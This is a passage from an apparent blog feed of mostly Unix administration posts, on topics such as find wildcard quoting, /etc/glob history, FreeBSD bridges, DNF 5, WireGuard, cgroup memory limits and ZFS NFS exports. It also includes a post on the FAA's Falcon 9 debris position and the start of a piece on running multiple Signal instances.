u@h:/a/b/c$ find /a -name program* -print

This reports '/a/b/c/program-1.2.tar' and '/a/b/f/program-1.2.tar', but you happen to know that there are other versions of the program under /a. What happened to a command that normally works fine?

As you may have already spotted, what happened is the shell's wildcard expansion. Because you ran your find in a directory that contained exactly one match for 'program*', the shell expanded it before you ran find, and what you actually ran was:

find /a -name program-1.2.tar -print

This reported the two instances of program-1.2.tar in the /a tree, but not the program-1.4.1.tar that was also in the /a tree.

If you'd run your find command in a directory without a shell match for the -name wildcard, the shell would (normally) pass the unexpanded wildcard through to find, which would do what you want. And if there had been only one instance of 'program-1.2.tar' in the tree, in your current directory, it might have been more obvious what went wrong; instead, the find returning more than one result made it look like it was working normally apart from inexplicably not finding and reporting 'program-1.4.1.tar'.
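The robust fix, wherever you happen to run the command, is to quote the wildcard so that find itself always sees it:

u@h:/a/b/c$ find /a -name 'program*' -print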

(If there were multiple matches for the wildcard in the current directory, 'find' would probably have complained and you'd have realized what was going on.)

Some shells have options to cause failed wildcard expansions to be considered an error; Bash has the 'failglob' shopt, for example. People who turn these options on are probably not going to stumble into this because they've already been conditioned to quote wildcards for 'find -name' and other similar tools. Possibly this Bash option or its equivalent in other shells should be the default for new Unix accounts, just so everyone gets used to quoting wildcards that are supposed to be passed through to programs.

(Although I don't use a shell that makes failed wildcard expansions an error, I somehow long ago internalized the idea that I should quote all wildcards I want to pass to programs.)

The (potential) complexity of good runqueue latency measurement in Linux

By: cks

Run queue latency is the time between when a Linux task becomes ready to run and when it actually runs. If you want good responsiveness, you want a low runqueue latency, so for a while I've been tracking a histogram of it with eBPF, and I put some graphs of it up on some Grafana dashboards I look at. Then recently I improved the responsiveness of my desktop with the cgroup V2 'cpu.idle' setting, and questions came up about how this differed from process niceness. When I was looking at those questions, I realized that my run queue latency measurements were incomplete.

When I first set up my run queue latency tracking, I wasn't using either cgroup V2 cpu.idle or process niceness, and so I set up a single global runqueue latency histogram for all tasks regardless of their priority and scheduling class. Once I started using 'idle' CPU scheduling (and testing the effectiveness of niceness), this resulted in hopelessly muddled data that was effectively meaningless during the times when multiple types of scheduling or multiple nicenesses were in use. Running CPU-consuming processes only when the system is otherwise idle is (hopefully) good for the runqueue latency of my regular desktop processes, but more terrible than usual for those 'run only when idle' processes, and generally there's going to be a lot more of them than my desktop processes.

The moment you introduce more than one 'class' of processes for scheduling, you need to split run queue latency measurements up between these classes if you want to really make sense of the results. What these classes are will depend on your environment. I could probably get away with a class for 'cpu.idle' tasks, a class for heavily nice'd tasks, a class for regular tasks, and perhaps a class for (system) processes running with very high priority. If you're doing fair share scheduling between logins, you might need a class per login (or you could ignore run queue latency as too noisy a measure).

I'm not sure I'd actually track all of my classes as Prometheus metrics. For my personal purposes, I don't care very much about the run queue latency of 'idle' or heavily nice'd processes, so perhaps I should update my personal metrics gathering to just ignore those. Alternately, I could write a bpftrace script that gathered the detailed class by class data, run it by hand when I was curious, and ignore the issue otherwise (continuing with my 'global' run queue latency histogram, which is at least honest in general).

The history and use of /etc/glob in early Unixes

By: cks

One of the innovations that the V7 Bourne shell introduced was built in shell wildcard globbing, which is to say expanding things like *, ?, and so on. Of course Unix had shell wildcards well before V7, but in V6 and earlier, the shell didn't implement globbing itself; instead this was delegated to an external program, /etc/glob (this affects things like looking into the history of Unix shell wildcards, because you have to know to look at the glob source, not the shell).

As covered in places like the V6 glob(8) manual page, the glob program was passed a command and its arguments (already split up by the shell), and went through the arguments to expand any wildcards it found, then exec()'d the command with the now expanded arguments. The shell operated by scanning all of the arguments for (unescaped) wildcard characters. If any were found, the shell exec'd /etc/glob with the whole show; otherwise, it directly exec()'d the command with its arguments. Quoting wildcards used a hack that will be discussed later.

This basic /etc/glob behavior goes all the way back to Unix V1, where we have sh.s and in it we can see that invocation of /etc/glob. In V2, glob is one of the programs that have been rewritten in C (glob.c), and in V3 we have a sh.1 that mentions /etc/glob and has an interesting BUGS note about it:

If any argument contains a quoted "*", "?", or "[", then all instances of these characters must be quoted. This is because sh calls the glob routine whenever an unquoted "*", "?", or "[" is noticed; the fact that other instances of these characters occurred quoted is not noticed by glob.

This section has disappeared in the V4 sh.1 manual page, which suggests that the V4 shell and /etc/glob had acquired the hack they use in V5 and V6 to avoid this particular problem.

How escaping wildcards works in the V5 and V6 shell is that all characters in commands and arguments are restricted to being seven-bit ASCII. The shell and /etc/glob both use the 8th bit to mark quoted characters, which means that such quoted characters don't match their unquoted versions and won't be seen as wildcards by either the shell (when it's deciding whether or not it needs to run /etc/glob) or by /etc/glob itself (when it's deciding what to expand). However, obviously neither the shell nor /etc/glob can pass such 'marked as quoted' characters to actual commands, so each of them strips the high bit from all characters before exec()'ing actual commands.

(This is clearer in the V5 glob.c source; look for how cat() ands every character with octal 0177 (0x7f) to drop the high bit. You can also see it in the V5 sh.c source, where you want to look at trim(), and also the #define for 'quote' at the start of sh.c and how it's used later.)
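As a tiny concrete illustration of the scheme (this is not the actual V5/V6 code, which works on whole strings):

#include <stdio.h>

#define QUOTE 0200    /* the 8th bit: 'this character was quoted' */

int main(void)
{
    int c = '*' | QUOTE;    /* how the shell marks a quoted '*' */

    /* glob compares full 8-bit values, so a marked '*' is not a wildcard */
    printf("is a wildcard: %s\n", (c == '*') ? "yes" : "no");

    /* before exec(), strip the marker so commands see plain ASCII */
    c &= 0177;
    printf("after stripping: %c\n", c);
    return 0;
}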

PS: I don't know why expanding shell wildcards used a separate program in V6 and earlier, but part of it may have been to keep the shell smaller and more minimal so that it required less memory.

PPS: See also Stephen R. Bourne's 2015 presentation from BSDCan [PDF], which has a bunch of interesting things on the V7 shell and confirms that /etc/glob was there from V1.

What a FreeBSD kernel message about your bridge means

By: cks

Suppose, not hypothetically, that you're operating a FreeBSD based bridging firewall (or some other bridge situation) and you see something like the following kernel message:

kernel: bridge0: mac address 01:02:03:04:05:06 vlan 0 moved from ix0 to ix1
kernel: bridge0: mac address 01:02:03:04:05:06 vlan 0 moved from ix1 to ix0

The bad news is that this message means what you think it means. Your FreeBSD bridge between ix0 and ix1 first saw this MAC address as the source address on a packet it received on the ix0 interface of the bridge, and then it saw the same MAC address as the source address of a packet received on ix1, and then it received another packet on ix0 with that MAC address as the source address. Either you have something echoing those packets back on one side, or there is a network path between the two sides that bypasses your bridge.

(If you're lucky this happens regularly. If you're not lucky it happens only some of the time.)

This particular message comes from bridge_rtupdate() in sys/net/if_bridge.c, which is called to update the bridge's 'routing entries', which here means MAC addresses, not IP addresses. This function is called from bridge_forward(), which forwards packets, which is itself called from bridge_input(), which handles received packets. All of this only happens if the underlying interfaces are in 'learning' mode, but this is the default.

As covered in the ifconfig manual page, you can inspect what MAC addresses have been learned on which device with 'ifconfig bridge0 addr' (covered in the 'Bridge Interface Parameters' section of the manual page). This may be useful to see if your bridge normally has a certain MAC address (perhaps the one that's moving) on the interface it should be on. If you want to go further, it's possible to set a static mapping for some MAC addresses, which will make them stick to one interface even if seen on another one.
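For example, to look at the learned addresses and then pin a flapping one to the interface it should be on (the interface and MAC here are hypothetical):

ifconfig bridge0 addr
ifconfig bridge0 static ix0 01:02:03:04:05:06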

Logging this message is controlled by the net.link.bridge.log_mac_flap sysctl, and it's rate limited with ppsratecheck() to being reported at most five times a second in general. That's five times a second in total, even if each report is for a different MAC address or even a different bridge. This 'five times a second' limit isn't controllable through a sysctl.

(I'm writing all of this down because I looked much of it up today. Sometimes I'm a system programmer who goes digging in the (FreeBSD) kernel source just to be sure.)

The issue with DNF 5 and script output in Fedora 41

By: cks

These days Fedora uses DNF as its high(er) level package management software, replacing yum. However, there are multiple versions of DNF, which behave somewhat differently. Through Fedora 40, the default version of DNF was DNF 4; in Fedora 41, DNF is now DNF 5. DNF 5 brings a number of improvements but it has at least one issue that makes me unhappy with it in my specific situation. Over on the Fediverse I said:

Oh nice, DNF 5 in Fedora 41 has nicely improved the handling of output from RPM scriptlets, so that you can more easily see that it's scriptlet output instead of DNF messages.

[later]

I must retract my praise for DNF 5 in Fedora 41, because it has actually made the handling of output from RPM scriptlets *much* worse than in dnf 4. DNF 5 will repeatedly re-print the current output to date of scriptlets every time it updates a progress indicator of, for example, removing packages. This results in a flood of output for DKMS module builds during kernel updates. Dnf 5's cure is far worse than the disease, and there's no way to disable it.

<bugzilla 2331691>

(Fedora 41 specifically has dnf5-5.2.8.1, at least at the moment.)

This can be mostly worked around for kernel package upgrades and DKMS modules by manually removing and upgrading packages before the main kernel upgrade. You want to do this so that dnf is removing as few packages as possible while your DKMS modules are rebuilding. This is done with:

  1. Upgrade all of your non-kernel packages first:

    dnf upgrade --exclude 'kernel*'
    

  2. Remove the following packages for the old kernel:

    kernel kernel-core kernel-devel kernel-modules kernel-modules-core kernel-modules-extra

    (It's probably easier to do 'dnf remove kernel*<version>*' and let DNF sort it out.)

  3. Upgrade two kernel packages that you can do in advance:

    dnf upgrade kernel-tools kernel-tools-libs
    

Unfortunately in Fedora 41 this still leaves you with one RPM package that you can't upgrade in advance and that will be removed while your DKMS module is rebuilding, namely 'kernel-devel-matched'. To add extra annoyance, this is a virtual package that contains no files, and you can't remove it because a lot of things depend on it.

As far as I can tell, DNF 5 has absolutely no way to shut off its progress bars. It completely ignores $TERM and I can't see anything else that leaves DNF usable. It would have been nice to have some command line switches to control this, but it seems pretty clear that this wasn't high on the DNF 5 road map.

(Although I don't expect this to be fixed in Fedora 41 over its lifetime, I am still deferring the Fedora 41 upgrades of my work and home desktops for as long as possible to minimize the amount of DNF 5 irritation I have to deal with.)

WireGuard's AllowedIPs aren't always the (WireGuard) routes you want

By: cks

A while back I wrote about understanding WireGuard's AllowedIPs, and also recently I wrote about how different sorts of WireGuard setups have different difficulties, where one of the challenges for some setups is setting up what you want routed through WireGuard connections. As Ian Z aka nobrowser recently noted in a comment on the first entry, these days many WireGuard related programs (such as wg-quick and NetworkManager) will automatically set routes for you based on AllowedIPs. Much of the time this will work fine, but there are situations where adding routes for all AllowedIPs ranges isn't what you want.

WireGuard's AllowedIPs setting for a particular peer controls two things at once: what (inside-WireGuard) source IP addresses you will accept from the peer, and what destination addresses WireGuard will send to that peer if the packet is sent to that WireGuard interface. However, it's the routing table that controls what destination addresses are sent to a particular WireGuard interface (or more likely a combination of IP policy routing rules and some routing table).

If your WireGuard IP address is only reachable from other WireGuard peers, you can sensibly bound your AllowedIPs so that the collection of all of them matches the routing table. This is also more or less doable if some of them are gateways for additional networks; hopefully your network design puts all of those networks under some subnet and the subnet isn't too big. However, if your WireGuard IP can wind up being reached by a broader range of source IPs, or even 'all of the Internet' (as is my case), then your AllowedIPs range is potentially much larger than what you want to always be routed to WireGuard.

A related case is if you have a 'work VPN' WireGuard configuration where you could route all of your traffic through your WireGuard connection but some of the time you only want to route traffic to specific (work) subnets. Unless you like changing AllowedIPs all of the time or constructing two different WireGuard interfaces and only activating the correct one, you'll want an AllowedIPs that accepts everything, even though some of the time you'll route only the specific work networks to the WireGuard interface.
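With wg-quick, one way to get this split is to leave AllowedIPs broad but turn off automatic route creation and add the routes you actually want by hand. A sketch, with invented subnets, names, and keys:

[Interface]
Address = 10.20.30.2/24
PrivateKey = <client private key>
# don't create routes from AllowedIPs automatically
Table = off
# route just the work subnets through the tunnel
PostUp = ip route add 192.0.2.0/24 dev %i
PostUp = ip route add 198.51.100.0/24 dev %i

[Peer]
PublicKey = <server public key>
Endpoint = vpn.example.org:51820
# accept traffic from (and allow sending to) anything over the tunnel
AllowedIPs = 0.0.0.0/0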

(On the other hand, with the state of things in Linux, having two separate WireGuard interfaces might be the easiest way to manage this in NetworkManager or other tools.)

I think that most people's use of WireGuard will probably involve AllowedIPs settings that also work for routing, provided that the tools involved handle the recursive routing problem. These days, NetworkManager handles that for you, although I don't know about wg-quick.

(This is one of the entries that I write partly to work it out in my own head. My own configuration requires a different AllowedIPs than the routes I send through the WireGuard tunnel. I make this work with policy based routing.)

My unusual X desktop wasn't made 'from scratch' in a conventional sense

By: cks

There are people out there who set up unusual (Unix) environments for themselves from scratch; for example, Mike Hoye recently wrote Idiosyncra. While I have an unusual desktop, I haven't built it from scratch in quite the same way that Mike Hoye and other people have; instead I've wound up with my desktop through a rather easier process.

It would be technically accurate to say that my current desktop environment has been built up gradually over time (including over the time I've been writing Wandering Thoughts, such as my addition of dmenu). But this isn't really how it happened, in that I didn't start from a normal desktop and slowly change it into my current one. The real story is that the core of my desktop dates from the days when everyone's X desktops looked like mine does. Technically there were what we would call full desktops back in those days, if you had licensed the necessary software from your Unix vendor and chose to run it, but hardware was sufficiently slow back then that people at universities almost always chose to run more lightweight environments (especially since they were often already using the inexpensive and slow versions of workstations).

(Depending on how much work your local university system administrators had done, your new Unix account might start out with the Unix vendor's X setup, or it could start out with what X11R<whatever> defaulted to when built from source, or it might be some locally customized setup. In all cases you often were left to learn about the local tastes in X desktops and how to improve yours from people around you.)

To show how far back this goes (which is to say how little of it has been built 'from scratch' recently), my 1996 SGI Indy desktop has much of the look and the behavior of my current desktop, and its look and behavior wasn't new then; it was an evolution of my desktop from earlier Unix workstations. When I started using Linux, I migrated my Indy X environment to my new (and better) x86 hardware, and then as Linux has evolved and added more and more things you have to run to have a usable desktop with things like volume control, your SSH agent, and automatically mounted removable media, I've added them piece by piece (and sometimes updated them as how you do this keeps changing).

(At some point I moved from twm as my window manager to fvwm, but that was merely redoing my twm configuration in fvwm, not designing a new configuration from scratch.)

I wouldn't want to start from scratch today to create a new custom desktop environment; it would be a lot of work (and the one time I looked at it I wound up giving up). Someday I will have to move from X, fvwm, dmenu, and so on to some sort of Wayland based environment, but even when I do I expect to make the result as similar to my current X setup as I can, rather than starting from a clean sheet design. I know what I want because I'm very used to my current environment and I've been using variants of it for a very long time now.

(This entry was sparked by Ian Z aka nobrowser's comment on my entry from yesterday.)

PS: Part of the long lineage and longevity of my X desktop is that I've been lucky and determined enough to use Unix and X continuously at work, and for a long time at home as well. So I've never had a time when I moved away from X on my desktop(s) and then had to come back to reconstruct an environment and catch it up to date.

PPS: This is one of the roots of my xdm heresy, where my desktops boot into a text console and I log in there to manually start X with a personal script that's a derivative of the ancient startx command.

In an unconfigured Vim, I want to do ':set paste' right away

By: cks

Recently I wound up using a FreeBSD machine, where I promptly installed vim for my traditional reason. When I started modifying some files, I had contents to paste in from another xterm window, so I tapped my middle mouse button while in insert mode (ie, I did the standard xterm 'paste text' thing). You may imagine the 'this is my face' meme when what vim inserted was the last thing I'd deleted in vim on that FreeBSD machine, instead of my X text selection.

For my future use, the cure for this is ':set paste', which turns off basically all of vim's special handling of pasted text. I've traditionally used this to override things like vim auto-indenting or auto-commenting the text I'm pasting in, but it also turns off vim's special mouse handling, which is generally active in terminal windows, including over SSH.

(The defaults for ':set mouse' seem to vary from system to system and probably vim build to vim build. For whatever reason, this FreeBSD system and its vim defaulted to 'mouse=a', ie special mouse handling was active all the time. I've run into mouse handling limits in vim before, although things may have changed since then.)
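If you only want to tame the mouse part of this, ':verbose set mouse?' will show the current value and where it was set, and ':set mouse=' turns vim's mouse handling off entirely:

:verbose set mouse?
:set mouse=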

In theory, as covered in Vim's X11 selection mechanism, I might be able to paste from another xterm (or whatever) using "*p (to use the '"*' register, which is the primary selection or the cut buffer if there's no primary selection). In practice I think this only works under limited circumstances (although I'm not sure what they are) and the Vim manual itself tells you to get used to using Shift with your middle mouse button. I would rather set paste mode, because that gets everything; a vim that has the mouse active probably has other things I don't want turned on too.

(Some day I'll put together a complete but minimal collection of vim settings to disable everything I want disabled, but that day isn't today.)

PS: If I'm reading various things correctly, I think vim has to be built with the 'xterm_clipboard' option in order to pull out selection information from xterm. Xterm itself must have 'Window Ops' allowed, which is not a normal setting; with this turned on, vim (or any other program) can use the selection manipulation escape sequences that xterm documents in "Operating System Commands". These escape sequences don't require that vim have direct access to your X display, so they can be used over plain SSH connections. Support for these escape sequences is probably available in other terminal emulators too, and these terminal emulators may have them always enabled.

(Note that access to your selection is a potential security risk, which is probably part of why xterm doesn't allow it by default.)

Cgroup V2 memory limits and their potential for thrashing

By: cks

Recently I read 32 MiB Working Sets on a 64 GiB machine (via), which recounts how under some situations, Windows could limit the working set ('resident set') of programs to 32 MiB, resulting in a lot of CPU time being spent on soft (or 'minor') page faults. On Linux, you can do similar things to limit memory usage of a program or an entire cgroup, for example through systemd, and it occurred to me to wonder if you can get the same thrashing effect with cgroup V2 memory limits. Broadly, I believe that the answer depends on what you're using the memory for and what you use to set limits, and it's certainly possible to wind up setting limits so that you get thrashing.

(As a result, this is now something that I'll want to think about when setting cgroup memory limits, and maybe watch out for.)

Cgroup V2 doesn't have anything that directly limits a cgroup's working set (what is usually called the 'resident set size' (RSS) on Unix systems). The closest it has is memory.high, which throttles a cgroup's memory usage and puts it under heavy memory reclaim pressure when it hits this high limit. What happens next depends on what sort of memory pages are being reclaimed from the process. If they are backed by files (for example, they're pages from the program, shared libraries, or memory mapped files), they will be dropped from the process's resident set but may stay in memory so it's only a soft page fault when they're next accessed. However, if they're anonymous pages of memory the process has allocated, they must be written to swap (if there's room for them) and I don't know if the original pages stay in memory afterward (and so are eligible for a soft page fault when next accessed). If the process keeps accessing anonymous pages that were previously reclaimed, it will thrash on either soft or hard page faults.

(The memory.high limit is set by systemd's MemoryHigh=.)

However, the memory usage of a cgroup is not necessarily in ordinary process memory that counts for RSS; it can be in all sorts of kernel caches and structures. The memory.high limit affects all of them and will generally shrink all of them, so in practice what it actually limits depends partly on what the processes in the cgroup are doing and what sort of memory that activity allocates. Some of this memory can also thrash like user memory does (for example, memory for disk cache), but some won't necessarily (I believe shrinking some sorts of memory usage discards the memory outright).

Since memory.high is to a certain degree advisory and doesn't guarantee that the cgroup never goes over this memory usage, I think people more commonly use memory.max (for example, via the systemd MemoryMax= setting). This is a hard limit and will kill programs in the cgroup if they push hard on going over it; however, the memory system will try to reduce usage with other measures, including pushing pages into swap space. In theory this could result in either swap thrashing or soft page fault thrashing, if the memory usage was just right. However, in our environments cgroups that hit memory.max generally wind up having programs killed rather than sitting there thrashing (at least for very long). This is probably partly because we don't configure much swap space on our servers, so there's not much room between hitting memory.max with swap available and exhausting the swap space too.

My view is that this generally makes it better to set memory.max than memory.high. If you have a cgroup that overruns whatever limit you're setting, using memory.high is much more likely to cause some sort of thrashing because it never kills processes (the kernel documentation even tells you that memory.high should be used with some sort of monitoring to 'alleviate heavy reclaim pressure', ie either raise the limit or actually kill things). In a past entry I set MemoryHigh= to a bit less than my MemoryMax setting, but I don't think I'll do that in the future; any gap between memory.high and memory.max is an opportunity for thrashing through that 'heavy reclaim pressure'.
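In systemd unit terms, my takeaway looks like this sketch (the actual limit value is made up):

[Service]
# a hard cap: the kernel kills something in the cgroup rather than
# leaving it to thrash under sustained reclaim pressure
MemoryMax=2G
# deliberately no MemoryHigh=; any gap between the two is room for
# 'heavy reclaim pressure' thrashing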

WireGuard on OpenBSD just works (at least as a VPN server)

By: cks

A year or so ago I mentioned that I'd set up WireGuard on an Android and an iOS device in a straightforward VPN configuration. What I didn't mention in that entry is that the other end of the VPN was not on a Linux machine, but on one of our OpenBSD VPN servers. At the time it was running whatever was the then-current OpenBSD version, and today it's running OpenBSD 7.6, which is the current version at the moment. Over that time (and before it, since the smartphones weren't its first WireGuard clients), WireGuard on OpenBSD has been trouble free and has just worked.

In our configuration, OpenBSD WireGuard requires installing the 'wireguard-tools' package, setting up an /etc/wireguard/wg0.conf (perhaps plus additional files for generated keys), and creating an appropriate /etc/hostname.wg0. I believe that all of these are covered as part of the standard OpenBSD documentation for setting up WireGuard. For this VPN server I allocated a /24 inside the RFC 1918 range we use for VPN service to be used for WireGuard, since I don't expect too many clients on this server. The server NATs WireGuard connections just as it NATs connections from the other VPNs it supports, which requires nothing special for WireGuard in its /etc/pf.conf.
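As an illustration only (the subnet is invented and the details vary), the /etc/hostname.wg0 for this sort of setup can be as simple as:

inet 10.20.30.1 255.255.255.0
!/usr/local/bin/wg setconf wg0 /etc/wireguard/wg0.conf
up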

(I did have to remember to allow incoming traffic to the WireGuard UDP port. For this server, we allow WireGuard clients to send traffic to each other through the VPN server if they really want to, but in another one we might want to restrict that with additional pf rules.)

Everything I'd expect to work does work, both in terms of the WireGuard tools (I believe the information 'wg' prints is identical between Linux and OpenBSD, for example) and for basic system metrics (as read out by, for example, the OpenBSD version of the Prometheus host agent, which has overall metrics for the 'wg0' interface). If we wanted per-client statistics, I believe we could probably get them through this third party WireGuard Prometheus exporter, which uses an underlying package to talk to WireGuard that does apparently work on OpenBSD (although this particular exporter can potentially have label cardinality issues), or generate them ourselves by parsing 'wg' output (likely from 'wg show all dump').

This particular OpenBSD VPN server is sufficiently low usage that I haven't tried to measure either the possible bandwidth we can achieve with WireGuard or the CPU usage of WireGuard. Historically, neither are particularly critical for our VPNs in general, which have generally not been capable of particularly high bandwidth (with either OpenVPN or L2TP, our two general usage VPN types so far; our WireGuard VPN is for system staff only).

(In an ideal world, none of this should count as surprising. In this world, I like to note when things that are a bit out of the mainstream just work for me, with a straightforward setup process and trouble free operation.)

A gotcha with importing ZFS pools and NFS exports on Linux (as of ZFS 2.3.0)

By: cks

Ever since its Solaris origins, ZFS has supported automatic NFS and CIFS sharing of ZFS filesystems through their 'sharenfs' and 'sharesmb' properties. Part of the idea of this is that you could automatically have NFS (and SMB) shares created and removed as you did things like import and export pools, rather than have to maintain a separate set of export information and keep it in sync with what ZFS filesystems were available. On Linux, OpenZFS still supports this, working through standard Linux NFS export permissions (which don't quite match the Solaris/Illumos model that's used for sharenfs) and standard tools like exportfs. A lot of this works more or less as you'd expect, but it turns out that there's a potentially unpleasant surprise lurking in how 'zpool import' and 'zpool export' work.

In the current code, if you import or export a ZFS pool that has no filesystems with a sharenfs set, ZFS will still run 'exportfs -ra' at the end of the operation even though nothing could have changed in the NFS exports situation. An important effect that this has is that it will wipe out any manually added or changed NFS exports, reverting your NFS exports to what is currently in /etc/exports and /etc/exports.d. In many situations (including ours) this is a harmless operation, because /etc/exports and /etc/exports.d are how things are supposed to be. But in some environments you may have programs that maintain their own exports list and permissions through running 'exportfs' in various ways, and in these environments a ZFS pool import or export will destroy those exports.

(Apparently one such environment is high availability systems, some of which manually manage NFS exports outside of /etc/exports (I maintain that this is a perfectly sensible design decision). These are also the kind of environment that might routinely import or export pools, as HA pools move between hosts.)

The current OpenZFS code runs 'exportfs -ra' entirely blindly. It doesn't matter if you don't NFS export any ZFS filesystems, much less any from the pool that you're importing or exporting. As long as an 'exportfs' binary is on the system and can be executed, ZFS will run it. Possibly this could be changed if someone was to submit an OpenZFS bug report, but for a number of reasons (including that we're not directly affected by this and aren't in a position to do any testing), that someone will not be me.

(As far as I can tell this is the state of the code in all Linux OpenZFS versions up through the current development version and 2.3.0-rc4, the latest 2.3.0 release candidate.)

Appendix: Where this is in the current OpenZFS source code

The exportfs execution is done in nfs_commit_shares() in lib/libshare/os/linux/nfs.c. This is called (indirectly) by sa_commit_shares() in lib/libshare/libshare.c, which is called by zfs_commit_shares() in lib/libzfs/libzfs_mount.c. In turn this is called by zpool_enable_datasets() and zpool_disable_datasets(), also in libzfs_mount.c, which are called as part of 'zpool import' and 'zpool export' respectively.
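If someone did want to change this, a minimal guard in nfs_commit_shares() might look something like the following. This is purely hypothetical, not actual or proposed OpenZFS code, and 'nfs_shares_changed' is an invented flag that libshare doesn't track today:

static int
nfs_commit_shares(void)
{
	char *argv[] = {
	    (char *)"/usr/sbin/exportfs",
	    (char *)"-ra",
	    NULL
	};

	/* hypothetical: skip exportfs when nothing NFS-related changed */
	if (!nfs_shares_changed)
		return (SA_OK);

	return (libzfs_run_process(argv[0], argv, 0));
}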

(As a piece of trivia, zpool_disable_datasets() will also be called during 'zpool destroy'.)

On the US FAA's response to Falcon 9 debris

By: VM

On February 1, SpaceX launched its Starlink 11-4 mission onboard a Falcon 9 rocket. The rocket's reusable first stage returned safely to the ground and the second stage remained in orbit after deploying the Starlink satellites. It was to deorbit later in a controlled procedure and land somewhere in the Pacific Ocean. But on February 19 it was seen breaking up in the skies over Denmark, England, Poland, and Sweden, with some larger pieces crashing into parts of Poland. After the Polish space agency determined the debris to belong to a SpaceX Falcon 9 rocket, the US Federal Aviation Administration (FAA) was asked about its liability. This was its response:

The FAA determined that all flight events for the SpaceX Starlink 11-4 mission occurred within the scope of SpaceX's licensed activities and that SpaceX satisfied safety at end-of-launch requirements. Per post-launch reporting requirements, SpaceX must identify any discrepancy or anomaly that occurred during the launch to the FAA within 90-days. The FAA has not identified any events that should be classified as a mishap at this time. Licensed flight activities and FAA oversight concluded upon SpaceX's last exercise of control over the Falcon 9 vehicle. SpaceX posted information on its website that the second stage from this launch reentered over Europe. The FAA is not investigating the uncontrolled reentry of the second stage nor the debris found in Poland.

I've spotted a lot of people on the internet (not trolls) describing this response as being in line with Donald Trump's "USA first" attitude and reckless disregard for the consequences of his government's actions and policies on other countries. It's understandable given how his meeting with Zelenskyy on February 28 played out as well as NASA acting administrator Janet Petro's disgusting comment about US plans to "dominate" lunar and cislunar space. However, the FAA's position has been unchanged since at least August 18, 2023, when it issued a "notice of proposed rulemaking" designated 88 FR 56546. Among other things:

The proposed rule would … update definitions relating to commercial space launch and reentry vehicles and occupants to reflect current legislative definitions … as well as implement clarifications to financial responsibility requirements in accordance with the United States Commercial Space Launch Competitiveness Act.

Under Section 401.5 2(i), the notice stated:

(1) Beginning of launch. (i) Under a license, launch begins with the arrival of a launch vehicle or payload at a U.S. launch site.

The FAA's position had likely been the same for some time before the August 2023 date. According to Table 1 in the notice, the "effect of change" of the clarification of the term "Launch", under which Section 401.5 2(i) falls, is:

None. The FAA has been applying these definitions in accordance with the statute since the [US Commercial Space Launch Competitiveness Act 2015] went into effect. This change would now provide regulatory clarity.

Skipping back a bit further, the FAA issued a "final rule" on "Streamlined Launch and Reentry License Requirements" on September 30, 2020. The rule states (pp. 680-681) under Section 450.1 (b) 3:

(i) For an orbital launch of a vehicle without a reentry of the vehicle, launch ends after the licensee’s last exercise of control over its vehicle on orbit, after vehicle component impact or landing on Earth, after activities necessary to return the vehicle or component to a safe condition on the ground after impact or landing, or after activities necessary to return the site to a safe condition, whichever occurs latest;
(ii) For an orbital launch of a vehicle with a reentry of the vehicle, launch ends after deployment of all payloads, upon completion of the vehicle's first steady-state orbit if there is no payload deployment, after vehicle component impact or landing on Earth, after activities necessary to return the vehicle or component to a safe condition on the ground after impact or landing, or after activities necessary to return the site to a safe condition, whichever occurs latest; …

In part B of this document, under the heading "Detailed Discussion of the Final Rule" and further under the sub-heading "End of Launch", the FAA presents the following discussion:

[Commercial Spaceflight Federation] and SpaceX suggested that orbital launch without a reentry in proposed §450.3(b)(3)(i) did not need to be separately defined by the regulation, stating that, regardless of the type of launch, something always returns: Boosters land or are disposed, upper stages are disposed. CSF and SpaceX further requested that the FAA not distinguish between orbital and suborbital vehicles for end of launch.
The FAA does not agree because the distinctions in § 450.3(b)(3)(i) and (ii) are necessary due to the FAA's limited authority on orbit. For a launch vehicle that will eventually return to Earth as a reentry vehicle, its on-orbit activities after deployment of its payload or payloads, or completion of the vehicle's first steady-state orbit if there is no payload, are not licensed by the FAA. In addition, the disposal of an upper stage is not a reentry under 51 U.S.C. Chapter 509, because the upper stage does not return to Earth substantially intact.

From 51 USC Chapter 509, Section 401.7:

Reentry vehicle means a vehicle designed to return from Earth orbit or outer space to Earth substantially intact. A reusable launch vehicle that is designed to return from Earth orbit or outer space to Earth substantially intact is a reentry vehicle.

This means Section 450.1 (b) 3(i) under "Streamlined Launch and Reentry License Requirements" of 2020 applies to the uncontrolled deorbiting of the Falcon 9 upper stage in the Starlink 11-4 mission. In particular, according to the FAA, the launch ended "after the licensee’s last exercise of control over its vehicle on orbit", which was the latest relevant event.

Back to the "Detailed Discussion of the Final Rule":

Both CSF and SpaceX proposed “end of launch” should be defined on a case-by-case basis in pre-application consultation and specified in the license. The FAA disagrees, in part. The FAA only regulates on a case-by-case basis if the nature of an activity makes it impossible for the FAA to promulgate rules of general applicability. This need has not arisen, as evidenced by decades of FAA oversight of end-of-launch activities. That said, because the commercial space transportation industry continues to innovate, §450.3(a) gives the FAA the flexibility to adjust the scope of license, including end of launch, based on unique circumstances as agreed to by the Administrator.

The world currently doesn't have a specific international law or agreement dealing with accountability for space debris that crashes to Earth, including paying for the damage such debris causes and imposing penalties on offending launch operators. In light of this, it's important to remember that the FAA's position (even if it seems disagreeable) has been unchanged for some time, even as the agency has regularly updated its rulemaking to accommodate private sector innovation within the spirit of the existing law.

Trump is an ass and I'm not holding out for him to look out for the concerns of other countries when pieces of made-in-USA rockets descend in uncontrolled fashion over their territories, damaging property or even taking lives. But the fact that the FAA didn't develop its present position afresh under Trump 2.0, and that the position was actually developed with feedback from SpaceX and other US-based spaceflight operators, matters: it shows that the agency's attitude towards crashing debris goes beyond ideology, having had the support of both Democratic and Republican administrations over the years.

Signal container

Signal is an application for secure and private messaging that is free, open source, and easy to use. It uses strong end-to-end encryption and is used by many activists, journalists, and whistleblowers, as well as government officials and business people. In short, by everyone who values their privacy. Signal runs on Android and iOS mobile phones, and also on desktop computers (Linux, Windows, MacOS), where the desktop version is designed to be linked with your mobile copy of Signal. This lets us use all of Signal's features both on the phone and on the desktop, and all messages, contacts, and so on are synchronized between the two devices. All well and good, but Signal is (unfortunately) tied to a phone number, and as a rule you can run only one copy of Signal on a single phone; the same goes for the desktop. Can this limitation be worked around? Certainly, but it takes a small "hack". Read on to find out how.

Running multiple copies of Signal on a phone

Running multiple copies of Signal on a phone is very easy, but only if you use GrapheneOS. GrapheneOS is a mobile operating system with numerous built-in security mechanisms, designed to take the best possible care of the user's privacy. It is open source and highly compatible with Android, but with many improvements that make forensic data seizure, as well as attacks with spyware like Pegasus and Predator, extremely difficult or outright impossible.

